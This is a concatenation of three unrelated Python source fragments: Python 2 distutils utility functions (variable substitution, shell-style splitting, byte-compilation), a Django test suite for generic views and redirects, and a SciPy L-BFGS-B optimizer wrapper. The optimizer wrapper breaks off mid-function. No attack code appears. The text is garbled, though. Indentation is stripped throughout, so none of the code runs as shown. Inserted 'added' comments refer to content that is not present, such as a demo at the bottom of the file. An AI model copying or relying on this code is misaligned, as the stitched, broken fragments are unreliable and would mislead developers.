if 'PLAT' not in os.environ:
os.environ['PLAT'] = get_platform()
_environ_checked = 1
def subst_vars(s, local_vars):
"""Perform shell/Perl-style variable substitution on 'string'. Every
    occurrence of '$' followed by a name is considered a variable, and the
    variable is substituted by the value found in the 'local_vars'
dictionary, or in 'os.environ' if it's not in 'local_vars'.
'os.environ' is first checked/augmented to guarantee that it contains
certain values: see 'check_environ()'. Raise ValueError for any
variables not found in either 'local_vars' or 'os.environ'.
"""
check_environ()
def _subst(match, local_vars=local_vars):
var_name = match.group(1)
if var_name in local_vars:
return str(local_vars[var_name])
else:
return os.environ[var_name]
try:
return re.sub('\\$([a-zA-Z_][a-zA-Z_0-9]*)', _subst, s)
except KeyError as var:
raise ValueError, "invalid variable '$%s'" % var
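# Illustration (added): with HOME=/home/user in the environment,
#     subst_vars('$HOME/lib/$PLAT', {'PLAT': 'linux-x86_64'})
# returns '/home/user/lib/linux-x86_64'; a '$NAME' found in neither
# 'local_vars' nor 'os.environ' raises ValueError.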
def grok_environment_error(exc, prefix='error: '):
"""Generate a useful error message from an EnvironmentError (IOError or
OSError) exception object. Handles Python 1.5.1 and 1.5.2 styles, and
does what it can to deal with exception objects that don't have a
filename (which happens when the error is due to a two-file operation,
    such as 'rename()' or 'link()'). Returns the error message as a string
prefixed with 'prefix'.
"""
if hasattr(exc, 'filename') and hasattr(exc, 'strerror'):
if exc.filename:
error = prefix + '%s: %s' % (exc.filename, exc.strerror)
else:
error = prefix + '%s' % exc.strerror
else:
error = prefix + str(exc[-1])
return error
_wordchars_re = _squote_re = _dquote_re = None
def _init_regex():
global _squote_re
global _wordchars_re
global _dquote_re
_wordchars_re = re.compile('[^\\\\\\\'\\"%s ]*' % string.whitespace)
_squote_re = re.compile("'(?:[^'\\\\]|\\\\.)*'")
_dquote_re = re.compile('"(?:[^"\\\\]|\\\\.)*"')
def split_quoted(s):
"""Split a string up according to Unix shell-like rules for quotes and
backslashes. In short: words are delimited by spaces, as long as those
spaces are not escaped by a backslash, or inside a quoted string.
Single and double quotes are equivalent, and the quote characters can
be backslash-escaped. The backslash is stripped from any two-character
escape sequence, leaving only the escaped character. The quote
characters are stripped from any quoted string. Returns a list of
words.
"""
if _wordchars_re is None:
_init_regex()
s = string.strip(s)
words = []
pos = 0
while s:
m = _wordchars_re.match(s, pos)
end = m.end()
if end == len(s):
words.append(s[:end])
break
if s[end] in string.whitespace:
words.append(s[:end])
s = string.lstrip(s[end:])
pos = 0
elif s[end] == '\\':
s = s[:end] + s[end + 1:]
pos = end + 1
else:
if s[end] == "'":
m = _squote_re.match(s, end)
elif s[end] == '"':
m = _dquote_re.match(s, end)
else:
raise RuntimeError, "this can't happen (bad char '%c')" % s[end]
if m is None:
raise ValueError, 'bad string (mismatched %s quotes?)' % s[end]
beg, end = m.span()
s = s[:beg] + s[beg + 1:end - 1] + s[end:]
pos = m.end() - 2
if pos >= len(s):
words.append(s)
break
return words
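# Illustration (added): applying the rules described in the docstring,
#     split_quoted('one "two three" four\\ five')
# returns ['one', 'two three', 'four five'] -- the quotes are stripped and the
# escaped space keeps 'four five' as a single word.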
def execute(func, args, msg=None, verbose=0, dry_run=0):
"""Perform some action that affects the outside world (eg. by
writing to the filesystem). Such actions are special because they
are disabled by the 'dry_run' flag. This method takes care of all
that bureaucracy for you; all you have to do is supply the
function to call and an argument tuple for it (to embody the
"external action" being performed), and an optional message to
print.
"""
if msg is None:
msg = '%s%r' % (func.__name__, args)
if msg[-2:] == ',)':
msg = msg[0:-2] + ')'
log.info(msg)
if not dry_run:
func(*args)
return
def strtobool(val):
"""Convert a string representation of truth to true (1) or false (0).
True values are 'y', 'yes', 't', 'true', 'on', and '1'; false values
are 'n', 'no', 'f', 'false', 'off', and '0'. Raises ValueError if
'val' is anything else.
"""
val = string.lower(val)
if val in ('y', 'yes', 't', 'true', 'on', '1'):
return 1
if val in ('n', 'no', 'f', 'false', 'off', '0'):
return 0
raise ValueError, 'invalid truth value %r' % (val,)
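# Illustration (added): strtobool('Yes') -> 1, strtobool('off') -> 0, and any
# other value (e.g. strtobool('maybe')) raises ValueError.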
def byte_compile(py_files, optimize=0, force=0, prefix=None, base_dir=None, verbose=1, dry_run=0, direct=None):
"""Byte-compile a collection of Python source files to either .pyc
or .pyo files in the same directory. 'py_files' is a list of files
to compile; any files that don't end in ".py" are silently skipped.
'optimize' must be one of the following:
0 - don't optimize (generate .pyc)
1 - normal optimization (like "python -O")
2 - extra optimization (like "python -OO")
If 'force' is true, all files are recompiled regardless of
timestamps.
The source filename encoded in each bytecode file defaults to the
filenames listed in 'py_files'; you can modify these with 'prefix' and
    'base_dir'. 'prefix' is a string that will be stripped off of each
source filename, and 'base_dir' is a directory name that will be
prepended (after 'prefix' is stripped). You can supply either or both
(or neither) of 'prefix' and 'base_dir', as you wish.
If 'dry_run' is true, doesn't actually do anything that would
affect the filesystem.
Byte-compilation is either done directly in this interpreter process
with the standard py_compile module, or indirectly by writing a
temporary script and executing it. Normally, you should let
    'byte_compile()' figure out whether to use direct compilation or not (see
the source for details). The 'direct' flag is used by the script
generated in indirect mode; unless you know what you're doing, leave
it set to None.
"""
if sys.dont_write_bytecode:
raise DistutilsByteCompileError('byte-compiling is disabled.')
if direct is None:
direct = __debug__ and optimize == 0
if not direct:
try:
from tempfile import mkstemp
script_fd, script_name = mkstemp('.py')
except ImportError:
from tempfile import mktemp
script_fd, script_name = None, mktemp('.py')
log.info("writing byte-compilation script '%s'", script_name)
if not dry_run:
if script_fd is not None:
script = os.fdopen(script_fd, 'w')
else:
script = open(script_name, 'w')
script.write('from distutils.util import byte_compile\nfiles = [\n')
script.write(string.join(map(repr, py_files), ',\n') + ']\n')
script.write('\nbyte_compile(files, optimize=%r, force=%r,\n prefix=%r, base_dir=%r,\n verbose=%r, dry_run=0,\n direct=1)\n' % (optimize, force, prefix, base_dir, verbose))
script.close()
cmd = [sys.executable, script_name]
if optimize == 1:
cmd.insert(1, '-O')
elif optimize == 2:
cmd.insert(1, '-OO')
spawn(cmd, dry_run=dry_run)
execute(os.remove, (script_name,), 'removing %s' % script_name, dry_run=dry_run)
else:
from py_compile import compile
for file in py_files:
if file[-3:] != '.py':
continue
cfile = file + (__debug__ and 'c' or 'o')
dfile = file
if prefix:
if file[:len(prefix)] != prefix:
raise ValueError, "invalid prefix: filename %r doesn't start with %r" % (
file, prefix)
dfile = dfile[len(prefix):]
if base_dir:
dfile = os.path.join(base_dir, dfile)
cfile_base = os.path.basename(cfile)
if direct:
if force or newer(file, cfile):
log.info('byte-compiling %s to %s', file, cfile_base)
if not dry_run:
compile(file, cfile, dfile)
else:
log.debug('skipping byte-compilation of %s to %s', file, cfile_base)
return
def rfc822_escape(header):
"""Return a version of the string escaped for inclusion in an
    RFC-822 header, by ensuring there are 8 spaces after each newline.
"""
lines = string.split(header, '\n')
    header = string.join(lines, '\n' + 8 * ' ')  # eight spaces, per the docstring
return header
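# Hedged usage sketch (added; not part of the original module). The values in
# the trailing comments are what the docstrings above imply, not captured
# output.
if __name__ == '__main__':
    print(rfc822_escape('Summary line\nsecond line'))
    # -> 'Summary line', a newline, then 'second line' indented by 8 spaces
    print(grok_environment_error(IOError(2, 'No such file or directory',
                                         'missing.txt')))
    # -> 'error: missing.txt: No such file or directory'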
|
|
from __future__ import unicode_literals
import time
import unittest
from django.core.exceptions import ImproperlyConfigured
from django.http import HttpResponse
from django.test import RequestFactory, SimpleTestCase, override_settings
from django.test.utils import require_jinja2
from django.urls import resolve
from django.views.generic import RedirectView, TemplateView, View
from . import views
class SimpleView(View):
"""
A simple view with a docstring.
"""
def get(self, request):
return HttpResponse('This is a simple view')
class SimplePostView(SimpleView):
post = SimpleView.get
class PostOnlyView(View):
def post(self, request):
return HttpResponse('This view only accepts POST')
class CustomizableView(SimpleView):
parameter = {}
def decorator(view):
view.is_decorated = True
return view
class DecoratedDispatchView(SimpleView):
@decorator
def dispatch(self, request, *args, **kwargs):
return super(DecoratedDispatchView, self).dispatch(request, *args, **kwargs)
class AboutTemplateView(TemplateView):
def get(self, request):
return self.render_to_response({})
def get_template_names(self):
return ['generic_views/about.html']
class AboutTemplateAttributeView(TemplateView):
template_name = 'generic_views/about.html'
def get(self, request):
return self.render_to_response(context={})
class InstanceView(View):
def get(self, request):
return self
class ViewTest(unittest.TestCase):
rf = RequestFactory()
def _assert_simple(self, response):
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, b'This is a simple view')
def test_no_init_kwargs(self):
"""
Test that a view can't be accidentally instantiated before deployment
"""
try:
SimpleView(key='value').as_view()
self.fail('Should not be able to instantiate a view')
except AttributeError:
pass
def test_no_init_args(self):
"""
Test that a view can't be accidentally instantiated before deployment
"""
try:
SimpleView.as_view('value')
self.fail('Should not be able to use non-keyword arguments instantiating a view')
except TypeError:
pass
def test_pathological_http_method(self):
"""
        The edge case of an HTTP request that spoofs an existing method name is caught.
"""
self.assertEqual(SimpleView.as_view()(
self.rf.get('/', REQUEST_METHOD='DISPATCH')
).status_code, 405)
def test_get_only(self):
"""
Test a view which only allows GET doesn't allow other methods.
"""
self._assert_simple(SimpleView.as_view()(self.rf.get('/')))
self.assertEqual(SimpleView.as_view()(self.rf.post('/')).status_code, 405)
self.assertEqual(SimpleView.as_view()(
self.rf.get('/', REQUEST_METHOD='FAKE')
).status_code, 405)
def test_get_and_head(self):
"""
Test a view which supplies a GET method also responds correctly to HEAD.
"""
self._assert_simple(SimpleView.as_view()(self.rf.get('/')))
response = SimpleView.as_view()(self.rf.head('/'))
self.assertEqual(response.status_code, 200)
def test_head_no_get(self):
"""
Test a view which supplies no GET method responds to HEAD with HTTP 405.
"""
response = PostOnlyView.as_view()(self.rf.head('/'))
self.assertEqual(response.status_code, 405)
def test_get_and_post(self):
"""
Test a view which only allows both GET and POST.
"""
self._assert_simple(SimplePostView.as_view()(self.rf.get('/')))
self._assert_simple(SimplePostView.as_view()(self.rf.post('/')))
self.assertEqual(SimplePostView.as_view()(
self.rf.get('/', REQUEST_METHOD='FAKE')
).status_code, 405)
def test_invalid_keyword_argument(self):
"""
Test that view arguments must be predefined on the class and can't
        be named like an HTTP method.
"""
# Check each of the allowed method names
for method in SimpleView.http_method_names:
kwargs = dict(((method, "value"),))
with self.assertRaises(TypeError):
SimpleView.as_view(**kwargs)
        # Check that a view argument is OK if it's predefined on the class...
CustomizableView.as_view(parameter="value")
# ...but raises errors otherwise.
with self.assertRaises(TypeError):
CustomizableView.as_view(foobar="value")
def test_calling_more_than_once(self):
"""
Test a view can only be called once.
"""
request = self.rf.get('/')
view = InstanceView.as_view()
self.assertNotEqual(view(request), view(request))
def test_class_attributes(self):
"""
Test that the callable returned from as_view() has proper
docstring, name and module.
"""
self.assertEqual(SimpleView.__doc__, SimpleView.as_view().__doc__)
self.assertEqual(SimpleView.__name__, SimpleView.as_view().__name__)
self.assertEqual(SimpleView.__module__, SimpleView.as_view().__module__)
def test_dispatch_decoration(self):
"""
Test that attributes set by decorators on the dispatch method
are also present on the closure.
"""
self.assertTrue(DecoratedDispatchView.as_view().is_decorated)
def test_options(self):
"""
Test that views respond to HTTP OPTIONS requests with an Allow header
appropriate for the methods implemented by the view class.
"""
request = self.rf.options('/')
view = SimpleView.as_view()
response = view(request)
self.assertEqual(200, response.status_code)
self.assertTrue(response['Allow'])
def test_options_for_get_view(self):
"""
Test that a view implementing GET allows GET and HEAD.
"""
request = self.rf.options('/')
view = SimpleView.as_view()
response = view(request)
self._assert_allows(response, 'GET', 'HEAD')
def test_options_for_get_and_post_view(self):
"""
Test that a view implementing GET and POST allows GET, HEAD, and POST.
"""
request = self.rf.options('/')
view = SimplePostView.as_view()
response = view(request)
self._assert_allows(response, 'GET', 'HEAD', 'POST')
def test_options_for_post_view(self):
"""
Test that a view implementing POST allows POST.
"""
request = self.rf.options('/')
view = PostOnlyView.as_view()
response = view(request)
self._assert_allows(response, 'POST')
def _assert_allows(self, response, *expected_methods):
"Assert allowed HTTP methods reported in the Allow response header"
response_allows = set(response['Allow'].split(', '))
self.assertEqual(set(expected_methods + ('OPTIONS',)), response_allows)
def test_args_kwargs_request_on_self(self):
"""
Test a view only has args, kwargs & request once `as_view`
has been called.
"""
bare_view = InstanceView()
view = InstanceView.as_view()(self.rf.get('/'))
for attribute in ('args', 'kwargs', 'request'):
self.assertNotIn(attribute, dir(bare_view))
self.assertIn(attribute, dir(view))
def test_direct_instantiation(self):
"""
It should be possible to use the view by directly instantiating it
without going through .as_view() (#21564).
"""
view = PostOnlyView()
response = view.dispatch(self.rf.head('/'))
self.assertEqual(response.status_code, 405)
@override_settings(ROOT_URLCONF='generic_views.urls')
class TemplateViewTest(SimpleTestCase):
rf = RequestFactory()
def _assert_about(self, response):
response.render()
self.assertContains(response, '<h1>About</h1>')
def test_get(self):
"""
Test a view that simply renders a template on GET
"""
self._assert_about(AboutTemplateView.as_view()(self.rf.get('/about/')))
def test_head(self):
"""
Test a TemplateView responds correctly to HEAD
"""
response = AboutTemplateView.as_view()(self.rf.head('/about/'))
self.assertEqual(response.status_code, 200)
def test_get_template_attribute(self):
"""
Test a view that renders a template on GET with the template name as
an attribute on the class.
"""
self._assert_about(AboutTemplateAttributeView.as_view()(self.rf.get('/about/')))
def test_get_generic_template(self):
"""
Test a completely generic view that renders a template on GET
with the template name as an argument at instantiation.
"""
self._assert_about(TemplateView.as_view(template_name='generic_views/about.html')(self.rf.get('/about/')))
def test_template_name_required(self):
"""
A template view must provide a template name.
"""
with self.assertRaises(ImproperlyConfigured):
self.client.get('/template/no_template/')
@require_jinja2
def test_template_engine(self):
"""
A template view may provide a template engine.
"""
request = self.rf.get('/using/')
view = TemplateView.as_view(template_name='generic_views/using.html')
self.assertEqual(view(request).render().content, b'DTL\n')
view = TemplateView.as_view(template_name='generic_views/using.html', template_engine='django')
self.assertEqual(view(request).render().content, b'DTL\n')
view = TemplateView.as_view(template_name='generic_views/using.html', template_engine='jinja2')
self.assertEqual(view(request).render().content, b'Jinja2\n')
def test_template_params(self):
"""
A generic template view passes kwargs as context.
"""
response = self.client.get('/template/simple/bar/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['foo'], 'bar')
self.assertIsInstance(response.context['view'], View)
def test_extra_template_params(self):
"""
A template view can be customized to return extra context.
"""
response = self.client.get('/template/custom/bar/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['foo'], 'bar')
self.assertEqual(response.context['key'], 'value')
self.assertIsInstance(response.context['view'], View)
def test_cached_views(self):
"""
A template view can be cached
"""
response = self.client.get('/template/cached/bar/')
self.assertEqual(response.status_code, 200)
time.sleep(1.0)
response2 = self.client.get('/template/cached/bar/')
self.assertEqual(response2.status_code, 200)
self.assertEqual(response.content, response2.content)
time.sleep(2.0)
# Let the cache expire and test again
response2 = self.client.get('/template/cached/bar/')
self.assertEqual(response2.status_code, 200)
self.assertNotEqual(response.content, response2.content)
def test_content_type(self):
response = self.client.get('/template/content_type/')
self.assertEqual(response['Content-Type'], 'text/plain')
def test_resolve_view(self):
match = resolve('/template/content_type/')
self.assertIs(match.func.view_class, TemplateView)
self.assertEqual(match.func.view_initkwargs['content_type'], 'text/plain')
def test_resolve_login_required_view(self):
match = resolve('/template/login_required/')
self.assertIs(match.func.view_class, TemplateView)
@override_settings(ROOT_URLCONF='generic_views.urls')
class RedirectViewTest(SimpleTestCase):
rf = RequestFactory()
def test_no_url(self):
"Without any configuration, returns HTTP 410 GONE"
response = RedirectView.as_view()(self.rf.get('/foo/'))
self.assertEqual(response.status_code, 410)
def test_default_redirect(self):
"Default is a temporary redirect"
response = RedirectView.as_view(url='/bar/')(self.rf.get('/foo/'))
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, '/bar/')
def test_permanent_redirect(self):
"Permanent redirects are an option"
response = RedirectView.as_view(url='/bar/', permanent=True)(self.rf.get('/foo/'))
self.assertEqual(response.status_code, 301)
self.assertEqual(response.url, '/bar/')
def test_temporary_redirect(self):
"Temporary redirects are an option"
response = RedirectView.as_view(url='/bar/', permanent=False)(self.rf.get('/foo/'))
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, '/bar/')
def test_include_args(self):
"GET arguments can be included in the redirected URL"
response = RedirectView.as_view(url='/bar/')(self.rf.get('/foo/'))
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, '/bar/')
response = RedirectView.as_view(url='/bar/', query_string=True)(self.rf.get('/foo/?pork=spam'))
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, '/bar/?pork=spam')
def test_include_urlencoded_args(self):
"GET arguments can be URL-encoded when included in the redirected URL"
response = RedirectView.as_view(url='/bar/', query_string=True)(
self.rf.get('/foo/?unicode=%E2%9C%93'))
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, '/bar/?unicode=%E2%9C%93')
def test_parameter_substitution(self):
"Redirection URLs can be parameterized"
response = RedirectView.as_view(url='/bar/%(object_id)d/')(self.rf.get('/foo/42/'), object_id=42)
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, '/bar/42/')
def test_named_url_pattern(self):
"Named pattern parameter should reverse to the matching pattern"
response = RedirectView.as_view(pattern_name='artist_detail')(self.rf.get('/foo/'), pk=1)
self.assertEqual(response.status_code, 302)
self.assertEqual(response['Location'], '/detail/artist/1/')
def test_named_url_pattern_using_args(self):
response = RedirectView.as_view(pattern_name='artist_detail')(self.rf.get('/foo/'), 1)
self.assertEqual(response.status_code, 302)
self.assertEqual(response['Location'], '/detail/artist/1/')
def test_wrong_named_url_pattern(self):
"A wrong pattern name returns 410 GONE"
response = RedirectView.as_view(pattern_name='wrong.pattern_name')(self.rf.get('/foo/'))
self.assertEqual(response.status_code, 410)
def test_redirect_POST(self):
"Default is a temporary redirect"
response = RedirectView.as_view(url='/bar/')(self.rf.post('/foo/'))
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, '/bar/')
def test_redirect_HEAD(self):
"Default is a temporary redirect"
response = RedirectView.as_view(url='/bar/')(self.rf.head('/foo/'))
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, '/bar/')
def test_redirect_OPTIONS(self):
"Default is a temporary redirect"
response = RedirectView.as_view(url='/bar/')(self.rf.options('/foo/'))
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, '/bar/')
def test_redirect_PUT(self):
"Default is a temporary redirect"
response = RedirectView.as_view(url='/bar/')(self.rf.put('/foo/'))
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, '/bar/')
def test_redirect_PATCH(self):
"Default is a temporary redirect"
response = RedirectView.as_view(url='/bar/')(self.rf.patch('/foo/'))
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, '/bar/')
def test_redirect_DELETE(self):
"Default is a temporary redirect"
response = RedirectView.as_view(url='/bar/')(self.rf.delete('/foo/'))
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, '/bar/')
def test_redirect_when_meta_contains_no_query_string(self):
"regression for #16705"
# we can't use self.rf.get because it always sets QUERY_STRING
response = RedirectView.as_view(url='/bar/')(self.rf.request(PATH_INFO='/foo/'))
self.assertEqual(response.status_code, 302)
def test_direct_instantiation(self):
"""
It should be possible to use the view without going through .as_view()
(#21564).
"""
view = RedirectView()
response = view.dispatch(self.rf.head('/foo/'))
self.assertEqual(response.status_code, 410)
class GetContextDataTest(unittest.TestCase):
def test_get_context_data_super(self):
test_view = views.CustomContextView()
context = test_view.get_context_data(kwarg_test='kwarg_value')
        # the test_name key is inserted by the test class's parent
self.assertIn('test_name', context)
self.assertEqual(context['kwarg_test'], 'kwarg_value')
self.assertEqual(context['custom_key'], 'custom_value')
# test that kwarg overrides values assigned higher up
context = test_view.get_context_data(test_name='test_value')
self.assertEqual(context['test_name'], 'test_value')
def test_object_at_custom_name_in_context_data(self):
        # Checks 'pony' key presence in dict returned by get_context_data
test_view = views.CustomSingleObjectView()
test_view.context_object_name = 'pony'
context = test_view.get_context_data()
self.assertEqual(context['pony'], test_view.object)
def test_object_in_get_context_data(self):
        # Checks 'object' key presence in dict returned by get_context_data (#20234)
test_view = views.CustomSingleObjectView()
context = test_view.get_context_data()
self.assertEqual(context['object'], test_view.object)
class UseMultipleObjectMixinTest(unittest.TestCase):
rf = RequestFactory()
def test_use_queryset_from_view(self):
test_view = views.CustomMultipleObjectMixinView()
test_view.get(self.rf.get('/'))
# Don't pass queryset as argument
context = test_view.get_context_data()
self.assertEqual(context['object_list'], test_view.queryset)
def test_overwrite_queryset(self):
test_view = views.CustomMultipleObjectMixinView()
test_view.get(self.rf.get('/'))
queryset = [{'name': 'Lennon'}, {'name': 'Ono'}]
self.assertNotEqual(test_view.queryset, queryset)
# Overwrite the view's queryset with queryset from kwarg
context = test_view.get_context_data(object_list=queryset)
self.assertEqual(context['object_list'], queryset)
class SingleObjectTemplateResponseMixinTest(unittest.TestCase):
def test_template_mixin_without_template(self):
"""
        We want to make sure that if you use a template mixin, but forget the
template, it still tells you it's ImproperlyConfigured instead of
TemplateDoesNotExist.
"""
view = views.TemplateResponseWithoutTemplate()
with self.assertRaises(ImproperlyConfigured):
view.get_template_names()
|
|
"""
Functions
---------
.. autosummary::
:toctree: generated/
fmin_l_bfgs_b
"""
## License for the Python wrapper
## ==============================
## Copyright (c) 2004 David M. Cooke <[email protected]>
## Permission is hereby granted, free of charge, to any person obtaining a
## copy of this software and associated documentation files (the "Software"),
## to deal in the Software without restriction, including without limitation
## the rights to use, copy, modify, merge, publish, distribute, sublicense,
## and/or sell copies of the Software, and to permit persons to whom the
## Software is furnished to do so, subject to the following conditions:
## The above copyright notice and this permission notice shall be included in
## all copies or substantial portions of the Software.
## THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
## IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
## FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
## AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
## LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
## FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
## DEALINGS IN THE SOFTWARE.
## Modifications by Travis Oliphant and Enthought, Inc. for inclusion in SciPy
from __future__ import division, print_function, absolute_import
import numpy as np
from numpy import array, asarray, float64, int32, zeros
from . import _lbfgsb
from .optimize import (approx_fprime, MemoizeJac, OptimizeResult,
_check_unknown_options, wrap_function,
_approx_fprime_helper)
__all__ = ['fmin_l_bfgs_b']
def fmin_l_bfgs_b(func, x0, fprime=None, args=(),
approx_grad=0,
bounds=None, m=10, factr=1e7, pgtol=1e-5,
epsilon=1e-8,
iprint=-1, maxfun=15000, maxiter=15000, disp=None,
callback=None):
"""
Minimize a function func using the L-BFGS-B algorithm.
Parameters
----------
func : callable f(x,*args)
Function to minimise.
x0 : ndarray
Initial guess.
fprime : callable fprime(x,*args), optional
The gradient of `func`. If None, then `func` returns the function
value and the gradient (``f, g = func(x, *args)``), unless
`approx_grad` is True in which case `func` returns only ``f``.
args : sequence, optional
Arguments to pass to `func` and `fprime`.
approx_grad : bool, optional
Whether to approximate the gradient numerically (in which case
`func` returns only the function value).
bounds : list, optional
``(min, max)`` pairs for each element in ``x``, defining
the bounds on that parameter. Use None or +-inf for one of ``min`` or
``max`` when there is no bound in that direction.
m : int, optional
The maximum number of variable metric corrections
used to define the limited memory matrix. (The limited memory BFGS
method does not store the full hessian but uses this many terms in an
approximation to it.)
factr : float, optional
The iteration stops when
``(f^k - f^{k+1})/max{|f^k|,|f^{k+1}|,1} <= factr * eps``,
where ``eps`` is the machine precision, which is automatically
generated by the code. Typical values for `factr` are: 1e12 for
low accuracy; 1e7 for moderate accuracy; 10.0 for extremely
high accuracy.
pgtol : float, optional
The iteration will stop when
``max{|proj g_i | i = 1, ..., n} <= pgtol``
where ``pg_i`` is the i-th component of the projected gradient.
epsilon : float, optional
Step size used when `approx_grad` is True, for numerically
calculating the gradient
iprint : int, optional
Controls the frequency of output. ``iprint < 0`` means no output;
``iprint == 0`` means write messages to stdout; ``iprint > 1`` in
addition means write logging information to a file named
``iterate.dat`` in the current working directory.
disp : int, optional
        If zero, then no output. If a positive number, then this overrides
`iprint` (i.e., `iprint` gets the value of `disp`).
maxfun : int, optional
Maximum number of function evaluations.
maxiter : int, optional
Maximum number of iterations.
callback : callable, optional
Called after each iteration, as ``callback(xk)``, where ``xk`` is the
current parameter vector.
Returns
-------
x : array_like
Estimated position of the minimum.
f : float
Value of `func` at the minimum.
d : dict
Information dictionary.
* d['warnflag'] is
- 0 if converged,
- 1 if too many function evaluations or too many iterations,
- 2 if stopped for another reason, given in d['task']
        * d['grad'] is the gradient at the minimum (should be close to 0)
* d['funcalls'] is the number of function calls made.
* d['nit'] is the number of iterations.
See also
--------
minimize: Interface to minimization algorithms for multivariate
functions. See the 'L-BFGS-B' `method` in particular.
Notes
-----
License of L-BFGS-B (FORTRAN code):
The version included here (in fortran code) is 3.0
(released April 25, 2011). It was written by Ciyou Zhu, Richard Byrd,
and Jorge Nocedal <[email protected]>. It carries the following
condition for use:
This software is freely available, but we expect that all publications
describing work using this software, or all commercial products using it,
quote at least one of the references given below. This software is released
under the BSD License.
References
----------
* R. H. Byrd, P. Lu and J. Nocedal. A Limited Memory Algorithm for Bound
Constrained Optimization, (1995), SIAM Journal on Scientific and
Statistical Computing, 16, 5, pp. 1190-1208.
* C. Zhu, R. H. Byrd and J. Nocedal. L-BFGS-B: Algorithm 778: L-BFGS-B,
FORTRAN routines for large scale bound constrained optimization (1997),
ACM Transactions on Mathematical Software, 23, 4, pp. 550 - 560.
* J.L. Morales and J. Nocedal. L-BFGS-B: Remark on Algorithm 778: L-BFGS-B,
FORTRAN routines for large scale bound constrained optimization (2011),
ACM Transactions on Mathematical Software, 38, 1.
"""
# handle fprime/approx_grad
if approx_grad:
fun = func
jac = None
elif fprime is None:
fun = MemoizeJac(func)
jac = fun.derivative
else:
fun = func
jac = fprime
# build options
if disp is None:
disp = iprint
opts = {'disp': disp,
'iprint': iprint,
'maxcor': m,
'ftol': factr * np.finfo(float).eps,
'gtol': pgtol,
'eps': epsilon,
'maxfun': maxfun,
'maxiter': maxiter,
'callback': callback}
res = _minimize_lbfgsb(fun, x0, args=args, jac=jac, bounds=bounds,
**opts)
d = {'grad': res['jac'],
'task': res['message'],
'funcalls': res['nfev'],
'nit': res['nit'],
'warnflag': res['status']}
f = res['fun']
x = res['x']
return x, f, d
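# Hedged usage sketch (added; names `f`, `g` and the data are illustrative,
# and a fuller demo already exists under __main__ at the bottom of this file):
#     def f(x):
#         return (x[0] - 2.0) ** 2 + (x[1] + 1.0) ** 2
#     def g(x):
#         return np.array([2.0 * (x[0] - 2.0), 2.0 * (x[1] + 1.0)])
#     x, fval, info = fmin_l_bfgs_b(f, x0=np.zeros(2), fprime=g,
#                                   bounds=[(0, None), (None, 0)])
# On success x is near [2., -1.] and info['warnflag'] == 0.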
def _minimize_lbfgsb(fun, x0, args=(), jac=None, bounds=None,
disp=None, maxcor=10, ftol=2.2204460492503131e-09,
gtol=1e-5, eps=1e-8, maxfun=15000, maxiter=15000,
iprint=-1, callback=None, **unknown_options):
"""
Minimize a scalar function of one or more variables using the L-BFGS-B
algorithm.
Options
-------
disp : bool
Set to True to print convergence messages.
maxcor : int
The maximum number of variable metric corrections used to
define the limited memory matrix. (The limited memory BFGS
method does not store the full hessian but uses this many terms
in an approximation to it.)
factr : float
The iteration stops when ``(f^k -
f^{k+1})/max{|f^k|,|f^{k+1}|,1} <= factr * eps``, where ``eps``
is the machine precision, which is automatically generated by
the code. Typical values for `factr` are: 1e12 for low
accuracy; 1e7 for moderate accuracy; 10.0 for extremely high
accuracy.
ftol : float
The iteration stops when ``(f^k -
f^{k+1})/max{|f^k|,|f^{k+1}|,1} <= ftol``.
gtol : float
The iteration will stop when ``max{|proj g_i | i = 1, ..., n}
<= gtol`` where ``pg_i`` is the i-th component of the
projected gradient.
eps : float
Step size used for numerical approximation of the jacobian.
maxfun : int
Maximum number of function evaluations.
maxiter : int
Maximum number of iterations.
"""
_check_unknown_options(unknown_options)
m = maxcor
epsilon = eps
pgtol = gtol
factr = ftol / np.finfo(float).eps
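    # Worked example of the conversion above (added comment): the legacy
    # interface speaks in terms of `factr` while this one takes
    # ``ftol = factr * eps``. With eps ~= 2.22e-16, factr = 1e7 (moderate
    # accuracy) corresponds to ftol ~= 2.22e-9, the default above.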
x0 = asarray(x0).ravel()
n, = x0.shape
if bounds is None:
bounds = [(None, None)] * n
if len(bounds) != n:
raise ValueError('length of x0 != length of bounds')
# unbounded variables must use None, not +-inf, for optimizer to work properly
bounds = [(None if l == -np.inf else l, None if u == np.inf else u) for l, u in bounds]
if disp is not None:
if disp == 0:
iprint = -1
else:
iprint = disp
n_function_evals, fun = wrap_function(fun, ())
if jac is None:
def func_and_grad(x):
f = fun(x, *args)
g = _approx_fprime_helper(x, fun, epsilon, args=args, f0=f)
return f, g
else:
def func_and_grad(x):
f = fun(x, *args)
g = jac(x, *args)
return f, g
nbd = zeros(n, int32)
low_bnd = zeros(n, float64)
upper_bnd = zeros(n, float64)
bounds_map = {(None, None): 0,
(1, None): 1,
(1, 1): 2,
(None, 1): 3}
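    # (Added comment) This encodes the `nbd` convention used by the Fortran
    # routine: 0 = unbounded, 1 = lower bound only, 2 = both bounds,
    # 3 = upper bound only; `l`/`u` are replaced by 1 below when a bound is set.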
for i in range(0, n):
l, u = bounds[i]
if l is not None:
low_bnd[i] = l
l = 1
if u is not None:
upper_bnd[i] = u
u = 1
nbd[i] = bounds_map[l, u]
x = array(x0, float64)
f = array(0.0, float64)
g = zeros((n,), float64)
